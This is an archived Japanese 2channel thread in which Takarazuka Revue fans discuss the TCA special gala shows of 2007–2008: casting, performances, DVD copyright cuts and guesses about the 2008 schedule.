127 :名無しさん@花束いっぱい。:2007/09/14(金) 20:13:56 ID:g0WePJfe
貶しも人それぞれの感想ねぇ・・・ただの馬鹿アンチじゃん

128 :名無しさん@花束いっぱい。:2007/09/14(金) 20:22:08 ID:M+SP78MZ
今年はとうこがトップメンバーに入ってから絶賛絶賛で分りやすいや。
去年までここまでじゃなかった。
歌対決もオサトウコより本公のオサじゅりのが圧倒的に聞きごたえあったのに
口をはさむ余地も与えないバカ絶賛。
ほんと分かりやすい。

129 :名無しさん@花束いっぱい。:2007/09/14(金) 20:32:38 ID:cZjUIS49
でもさ、2部最初の2番手(プラス1人?)の4人の
あの派手ロングコートのディスコメドレーは
素直にかっこいいっておもたよ。
時期トップこの4人世代もなかなかいいなぁって。
ゆひも入れてあげりゃいいのにな。

130 :名無しさん@花束いっぱい。:2007/09/14(金) 20:33:46 ID:sh9OONDn
>>126
決め付けイクナイのは同感だけど、>>114以降を「感想はひとそれぞれ」と言うのは
無理がありすぎる

>>128もなー、おさじゅり・おさゆみの本公だって大絶賛でしたが何か?って感じだ。


131 :名無しさん@花束いっぱい。:2007/09/14(金) 20:39:27 ID:1c1hK+hO
去年は轟オンパレードでつまんなかった。
曲も古くさいのばっかでまるで歌謡曲ショー。
2番手以下のジョイフルが一番楽しかったよ。

132 :名無しさん@花束いっぱい。:2007/09/14(金) 20:51:50 ID:2Yp/qbLQ
組ごとに固まってなんかやるコーナーいらない。
そんなもん本公演でいくらでも見れるから時間の無駄。
稽古時間がなくて組を超えた組み合わせができないなら
昔みたいに3番手あたりまで一人ずつソロ歌う構成の方がいい。

133 :名無しさん@花束いっぱい。:2007/09/14(金) 22:00:01 ID:8tQqYTIv
>>130
116は煽り・アンチだろうが、その後ネタ化させてマターリさせようとしている、彼らの努力がわからんのか。




134 :名無しさん@花束いっぱい。:2007/09/14(金) 22:04:52 ID:Le6Ut8ac
>133
努力に報いるためにお主も亀レスせずスルーすべし。

135 :名無しさん@花束いっぱい。:2007/09/14(金) 22:09:50 ID:P9OTVgy1
TCAイラネ

136 :名無しさん@花束いっぱい。:2007/09/14(金) 22:10:18 ID:Oje5ZqcZ
おさ・あさにとう・ミズが加わって、去年と又違った面白さ。
絶賛絶賛なんて大げさなカキコなんてどこにもないからから
ヘンな応酬はナシでまたーりとね。

137 :名無しさん@花束いっぱい。:2007/09/14(金) 22:37:18 ID:bZyIeRNk
ま、やっぱりTCAはあった方がいいってことで!

演出家の若返りをぜひお願いしたい。
もう三木イラネ。少し風入れようや。

◆イケコにどっぷり全編やらせてみる。
◆藤井・荻田・斎藤の3匹かませて競わせる
◆女性作家対抗・植田ケコ&児玉(何からパクるかの期待)&謝先生
◆荻田・植田ケコのお耽美対決
とかね。

138 :名無しさん@花束いっぱい。:2007/09/14(金) 23:17:41 ID:nL9+nIyZ
昨年のトップコンビシャッフル楽しかったな〜
できれば、アサまー、コムかな、わたるい、水とながよかったけど
水となコンビのプチお披露目を兼ねたらもっと盛り上がっただろうに

139 :名無しさん@花束いっぱい。:2007/09/14(金) 23:22:19 ID:nL9+nIyZ
>>130
それを言うなら>>28とかも相当感じ悪いと思うけど?
お互いさまじゃない?

140 :名無しさん@花束いっぱい。:2007/09/14(金) 23:46:26 ID:lwbl76ra
138が、厚かましく、去年まだ2番手だったミズをトップに連ねている件について。

わたる、コム、アサコ、かしげだよ、去年のトップは。



141 :名無しさん@花束いっぱい。:2007/09/14(金) 23:47:49 ID:Le6Ut8ac
ID:nL9+nIyZのことはスルーしてあげて。

142 :名無しさん@花束いっぱい。:2007/09/15(土) 00:22:29 ID:GmQ7HlXY
>139
流れが変わったんだから…その流れに乗ろうよ。

143 :名無しさん@花束いっぱい。:2007/09/15(土) 01:25:55 ID:2hff0zGL
演出家入れ替えはしてほしいね。
新鮮味がまっったく無いし。

144 :名無しさん@花束いっぱい。:2007/09/15(土) 08:01:27 ID:9gRqxw4x
2元中継の時、スクリーンが気になって後ろばかり見ているとうこに対して
「とうこ!前向いてください〜」と叫んだ東宝組の方はどなただったのでしょうか?
お解りになる方いらっしゃいますか?

145 :名無しさん@花束いっぱい。:2007/09/15(土) 08:23:42 ID:kd70daBo
>144
マミさん

146 :名無しさん@花束いっぱい。:2007/09/15(土) 08:36:48 ID:dUajjxCc
トップと娘2、娘1と2番手のシャッフル汁。
メドレーでいいからその他扱いのスターにもソロ歌わせる。
次代のスターを盛り上げる演出する!

147 :名無しさん@花束いっぱい。:2007/09/15(土) 10:21:53 ID:pWqs6qjR
87年のラ・シャンソンみたいな構成がいいなー。
全員が舞台に出ている状態でメドレー。誰か歌ってる時他の人は後ろで踊る。
曲ごとにカップルが変わったり、男役同士、娘役同士など色んな組合せが見れて激ウマーだったよ。

148 :名無しさん@花束いっぱい。:2007/09/15(土) 10:51:02 ID:3V35IMUl
>147
20年前…。
今年のTCAも20年後に、07年の良かったねと言われるのだろうか?

149 :名無しさん@花束いっぱい。:2007/09/15(土) 11:13:05 ID:C0Hjxozr
やっとスカステで前半1時間しか録れてないTCA2007を観た

おさとう、歌いいねー!DVDでカットにならないことを切に願う。
ウチの機では音声があまり大きく撮れないのでDVDでもっとひたりたい。
みずは本人比でやや歌が良くなってた。
あさこはこういうイベントでは大人っぽくてシリアスなのに当たるのに
本公演ではコメディがよくあたるね。
話題の2番手黒燕尾大階段だけど、まぁきりやんは貫禄の登場だが
まとぶん、ちょっと自信なさそげなのが気になる。組コーナーでは
そんなことなかった。背筋をピンとしただけでも大分違うのでがんがれ。

150 :名無しさん@花束いっぱい。:2007/09/15(土) 12:10:30 ID:wBjDaCYb
>トップと娘2、娘1と2番手のシャッフル汁。

そうそう、それやって欲しい。

151 :名無しさん@花束いっぱい。:2007/09/15(土) 16:35:55 ID:LBo1fVEn
>148
その年のトップファンは云うかもしれない。
でも特に贔屓が居ないと、あのほうがずっと楽しい。


152 :名無しさん@花束いっぱい。:2007/09/15(土) 17:01:25 ID:3L/LWt/X
ご贔屓いない人はチケット取らないでほしい。
どうせ気にいらないのだろうから。

153 :名無しさん@花束いっぱい。:2007/09/15(土) 20:37:50 ID:ozszB8x9
とう・水トークを期待していたのだが・・・ちょっぴり残念だった。

154 :名無しさん@花束いっぱい。:2007/09/16(日) 20:27:00 ID:RSvAjUIl
クンバンチェロ、普段花組みないからオサの歌ってるとこあまり見たことなかったんだけど、
なんであんな目じり下げて歌うのw?
娘役を見る目が好々爺みたいで面白い。ヤバイ、今になって嵌りそうだ。

155 :名無しさん@花束いっぱい。:2007/10/19(金) 23:22:39 ID:YOuy04ft
舞踊会はここでいいよね?

贅沢なものだね。
住んでる組スレに個人のことは書いたけど。
囃し方って言うんだと思うけど
唄も三味線や笛や鼓などの楽器に「きのね(?)」の音が
もう贅沢〜っていう感じ。

正直に言うと囃し方に踊りが見合ってないケースは無いわけじゃなかった。
日舞のことなんか全然わからないけど
上手下手ってやっぱりわかるんだと思った。
台詞があると発声の良し悪しもわかっちゃうし。
いくら素人でもたまに歌舞伎や新派を観たりしてるとね。

よっちゃん先生のすごさが改めてわかった気がする。
ソロはタニちゃんとれおんとよっちゃん先生だったけど
舞台で大きく見えるのは、よっちゃん>れおん>タニちゃん
れおんは洋舞のまま日舞の振りを踊ってたけど
元々軸がぶれないからそれなりに安心できた。

娘トップ3人の三番叟では
「さくら」でお引きずりを経験した分かあすかちゃんに余裕があった。
フィナーレナンバーでウメちゃんがにこりともしないのは気になった。
あすかちゃんもあやねちゃんもにこにこしてて可愛かったのになー。

ベテラン勢の中でもチャルさんが上手い。
若手ではみっちゃんが上手く見えた。(台詞声が良いから得してるのかも)

156 :名無しさん@花束いっぱい。:2007/10/19(金) 23:25:05 ID:amih3Lmd
>>155
宝塚舞踊会
ttp://hobby10.2ch.net/test/read.cgi/siki/1127220255/

157 :名無しさん@花束いっぱい。:2007/11/18(日) 23:35:33 ID:A4kJ1KDA
保守

158 :名無しさん@花束いっぱい。:2007/12/16(日) 22:25:03 ID:aY9Zh+RL
>>136
久しぶりにあの人がいないTCAだったから盛り上がるのも無理ないよ

159 :名無しさん@花束いっぱい。:2008/01/13(日) 05:12:07 ID:7V9fs7TP
今年の日程は6月下旬に花雪星宙でやると予想。
9月はトウコとアサコが東京で公演中だからないだろうし。
皆さんの予想やいかに。

160 :名無しさん@花束いっぱい。:2008/01/13(日) 09:43:04 ID:8EKPAZKH
とうことあさことタニ、この3人が出られる時期だと思う。

161 :名無しさん@花束いっぱい。:2008/01/13(日) 09:45:53 ID:Jzz9itLP
宙も入るということは…あのお方も出演?!(>_<)

162 :名無しさん@花束いっぱい。:2008/01/13(日) 10:03:59 ID:5df4Pgh0
>160
ミズは?

163 :名無しさん@花束いっぱい。:2008/01/15(火) 23:28:40 ID:wGDYj0ya
今年も9月開催で
ムラ 花雪宙
東京 月星
だったりして。

164 :名無しさん@花束いっぱい。:2008/01/18(金) 07:50:15 ID:b5h5BtNw
2006年TCAの二部最初,二番手さんのジョイフルの場面のバックで
上手のほうでマイク持ってコーラスされてる男女(役)はどなたですか?

165 :名無しさん@花束いっぱい。:2008/01/18(金) 08:03:36 ID:ovP12ZjN
マイク持ってるのは柚希礼音と和音美桜だけだったかと
上手に居るのは男役の柚希礼音だけだったかと

166 :名無しさん@花束いっぱい。:2008/01/18(金) 08:18:04 ID:b5h5BtNw
>>165
ありがとうございます。質問スレでないのにごめんなさい。
顔がはっきりわからなかったので…
パンチの効いたコーラスでwwよかったです〜ww

167 :名無しさん@花束いっぱい。:2008/01/18(金) 17:03:44 ID:TcATlaRz
今年のTCA花が東京の7月後半と予想。
(新トップは来年があるからという理由)

IDがTCAなので記念カキコ

168 :名無しさん@花束いっぱい。:2008/02/04(月) 18:34:49 ID:kE5wSPww
去年のアローレビューDVDを見ましたが
東宝オケのトランペットちょっとひどすぎませんか?
宙組とチエたち気の毒…とオモタ。
まあタニの歌も負けてなかったけど。

169 :名無しさん@花束いっぱい。:2008/02/09(土) 11:11:45 ID:yFUNNtYx
今年のTCA、かなみんがいるうちにやってホスィ・・・
ムリだろうなーorz

170 :名無しさん@花束いっぱい。:2008/04/30(水) 04:08:11 ID:hXL3wqoc
TCAいつなんだろ?

DVDになる時カットがありませんよーに(-人-)

171 :名無しさん@花束いっぱい。:2008/05/05(月) 00:01:48 ID:kN3Eqvxk
あぁ〜〜永久に〜幸〜あ―れ―と〜〜〜♪

172 :名無しさん@花束いっぱい。:2008/05/05(月) 19:50:49 ID:kN3Eqvxk
レビューのいのち〜〜〜たた〜〜えよう〜〜〜

173 :名無しさん@花束いっぱい。:2008/05/08(木) 00:04:45 ID:wJNmWNld
雪公演日程、時間
を見る限り雪公演中ではなさそうだねー

174 :名無しさん@花束いっぱい。:2008/06/20(金) 18:06:04 ID:6WmXboud
TCAは12月です
間違いないみたいです

175 :名無しさん@花束いっぱい。:2008/06/20(金) 19:42:32 ID:8n/GcoDP
雪組TCA出演者
水、彩吹、音月、彩那、凰稀、緒月、沙央
白羽、大月、愛原

176 :名無しさん@花束いっぱい。:2008/06/20(金) 20:13:35 ID:t2LzUtXt
娘役は世代交代だね。シナやいづるんはもう流石に出ないか。
つーと、星もコトコトも出なそうだね。

177 :名無しさん@花束いっぱい。:2008/06/20(金) 21:16:25 ID:LsXCC4V4
えー、残念。ことこと見てたらゆうこ思い出して好きだったのにー

178 :名無しさん@花束いっぱい。:2008/06/28(土) 12:54:17 ID:S1jb0m7m
ホントにTCAが12月だったらDVD出るの年跨ぐってことだよね。

ふざけてる。

179 :名無しさん@花束いっぱい。:2008/06/28(土) 17:05:54 ID:GxsMhOLj
でももう6月末だもんね。
9月開催は無理でしょ?
10月は舞踊会だよね。
11月か12月でしょ。
今年はやんないって事はありえないわけだし。たぶん。

180 :名無しさん@花束いっぱい。:2008/06/29(日) 19:38:41 ID:dQw1zIv/
>>178
なんでふざけてるのかワカラン

181 :名無しさん@花束いっぱい。:2008/07/15(火) 16:18:21 ID:olfFkb1X
TCAいらない

182 :名無しさん@花束いっぱい。:2008/07/15(火) 18:08:36 ID:LIXRwHpa
>>181
興味ないなら見なきゃいいだけじゃん。
自分勝手な奴だな。

183 :名無しさん@花束いっぱい。:2008/07/17(木) 01:25:37 ID:Fd1Gaj6I
今年のTCAは著作権の都合上カット、が有りませんように。
有るなら歌下手さんが歌ってるシーンでありますように。

184 :名無しさん@花束いっぱい。:2008/07/17(木) 16:09:08 ID:JmhnosMF
>>183
私の大好きなミズをいじめないで〜!!

185 :名無しさん@花束いっぱい。:2008/07/17(木) 23:48:47 ID:yaQvjQOq
よくあんだけ著作権カットだらけのDVD売るよね?
恥ずかしくないのかな?

金払えよドケチ阪急!

186 :名無しさん@花束いっぱい。:2008/07/18(金) 00:13:02 ID:qEmN8IKQ
アホか。金を惜しんでるわけじゃない。
金を払うっていってもダメな場合もあるし
許可が降りるまでに時間がかかりすぎで収録できない場合もある。
それより著作権ひっかかりそうな曲を使う演出家に文句をいいたい。

187 :名無しさん@花束いっぱい。:2008/07/19(土) 01:16:24 ID:XlHRIQxi
また宙組でないのか〜(´・ω・`)

188 :名無しさん@花束いっぱい。:2008/07/19(土) 19:08:36 ID:P+UhXsvP
2008/07/18
『タカラヅカスペシャル2008〜La Festa!〜』について
『タカラヅカスペシャル2008〜La Festa!〜』構成・演出/三木章雄、中村 暁、石田昌也

日本物から洋物まで、世界各地を舞台とした幅広いジャンルの名曲の数々で構成し、各組スターの競演で宝塚歌劇の魅力をお見せするバラエティに富んだショー。フィナーレは華やかなクリスマスソングメドレーを繰り広げます。

■会場  梅田芸術劇場メインホール
■日時  2008年12月20日(土)14:00、★18:00
     2008年12月21日(日)★12:00、16:00
     ※20日18時、21日12時公演は、宝塚友の会優先公演となります。
■座席料金  S席10,000円、A席7,000円、B席5,000円
■一般前売  2008年11月22日(土)
■主な出演者 
(専科)松本悠里、轟悠 他
(花組)真飛 聖 他
(月組)瀬奈じゅん 他
(雪組)未定
(星組)安蘭けい 他
※その他詳細につきましては決定次第、ご案内いたします。
<お問い合わせ> 宝塚歌劇インフォメーションセンター


189 :名無しさん@花束いっぱい。:2008/07/19(土) 19:11:18 ID:P+UhXsvP
(12月13日)〜12月25日 雪DC公演中(水とな出演)
(11月21日)〜12月27日 宙東宝公演中。

190 :名無しさん@花束いっぱい。:2008/07/21(月) 12:25:52 ID:0HIx27fz
雪の未定ってあやしい。

191 :名無しさん@花束いっぱい。:2008/07/21(月) 14:32:21 ID:NWj59aT1
ホンマに〜雪からは誰が出んのか気になるし〜
水となは出ないと思っといた方がいい?

192 :名無しさん@花束いっぱい。:2008/07/21(月) 14:41:10 ID:UiWc8rO+
>191
みずとなは出演しない。
ゆみこと下級生が出る予定。

193 :名無しさん@花束いっぱい。:2008/07/21(月) 15:09:24 ID:19GtH1ka
それより、なんで水となが出られる日程にしなかったんだろ?
DCを何日か前倒しするか、スペシャルを後ろにずらすかすれば出られるのに。
お稽古なんて公演後できるでしょうに。
ちょっと働かせすぎか(^^);

194 :名無しさん@花束いっぱい。:2008/07/21(月) 18:20:59 ID:66LlPmVv
>193
それもだけど何で大劇場でやれる日程にしなかったのか
確実に全席埋まるから席数が多い方が儲かるのに
オケの都合で大階段もないだろう

195 :名無しさん@花束いっぱい。:2008/07/21(月) 20:23:27 ID:/GVmSB9p
>>194
大人の事情。
大劇場でしたら、主催・阪急電鉄で金かかるけど、
梅芸でしたら、共催もしくは主催放棄で金が浮くから。

196 :名無しさん@花束いっぱい。:2008/07/21(月) 23:15:27 ID:MrybxEDY
>192
ゆみこにイベントでの仮トップを経験させて、それを餞別にするのか?

197 :名無しさん@花束いっぱい。:2008/07/21(月) 23:34:05 ID:CoHfxiwi
>>196
イベントで仮トップの経験なんてできませんが

198 :名無しさん@花束いっぱい。:2008/07/21(月) 23:55:28 ID:KNjdzGOq
マヤミキさんとタータンがトップとあまり違わない扱いが
あったことがある>TCA(TMP)
ま、二人ともトップ射程距離内の時期の話
今回ゆみこが出たとしても二番手筆頭きりやんが出るから
マヤミキさん・タータンほどの扱いはしてもらえるかどーか

199 :名無しさん@花束いっぱい。:2008/07/21(月) 23:57:34 ID:PKfyllXO
>>198
ないよ絶対。
みきちゃんもタータンもトップ決まってた。
確か発表になってたはず。

ゆみこがどうのって事じゃないんだけどね

200 :194:2008/07/22(火) 12:57:00 ID:KKwatVTW
>>195
なるほど。
でもそんなエコはやだーorz

201 :名無しさん@花束いっぱい。:2008/07/22(火) 20:29:08 ID:VZZ3CeJI
>(専科)松本悠里、轟悠 他

このお二人の日舞ショーが
長々とあるのだろうか…

202 :名無しさん@花束いっぱい。:2008/07/24(木) 00:49:07 ID:dOscB4+A
専科イラナイとおも

203 :名無しさん@花束いっぱい。:2008/08/04(月) 20:45:05 ID:r2jL1Qpg
− −
 」
 =

204 :名無しさん@花束いっぱい。:2008/08/04(月) 21:41:22 ID:qgnR90Wm
(●▽●)<ミズサソどうしますたか?

205 :名無しさん@花束いっぱい。:2008/08/04(月) 21:47:46 ID:9scMYRGG
一幕は専科様の芝居
2幕は、歌いまくりなんだろうね
そして理事がトップ2人いない分沢山出る予感

206 :名無しさん@花束いっぱい。:2008/08/04(月) 21:50:25 ID:6CD8LkAX
理事は普通に髭を生やしてその辺に立っててくれるだけでいいよ

207 :名無しさん@花束いっぱい。:2008/08/04(月) 23:18:06 ID:r2jL1Qpg
 − − <……
  」〃
  =


208 :名無しさん@花束いっぱい。:2008/08/04(月) 23:24:11 ID:E82/MO6z
ついに大劇場離れが現実になったような気がした・・

209 :名無しさん@花束いっぱい。:2008/08/04(月) 23:42:19 ID:hfoTZpRn
− −
 」
 =   人(●▽●)<ことしはでないでつ

210 :名無しさん@花束いっぱい。:2008/08/05(火) 00:41:45 ID:8x+WvbC3
トーコ水タニの並びが見たいな
来年95周年に期待

211 :名無しさん@花束いっぱい。:2008/08/17(日) 13:07:45 ID:CR0wJvz/
(●▽●)

212 :名無しさん@花束いっぱい。:2008/08/20(水) 04:22:59 ID:eEQ3WMB2
昨日未開封だったマニフィーク・タカラヅカ観た。
麻路さんのロッキーを真似たポッキー、好きだなぁ

48 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)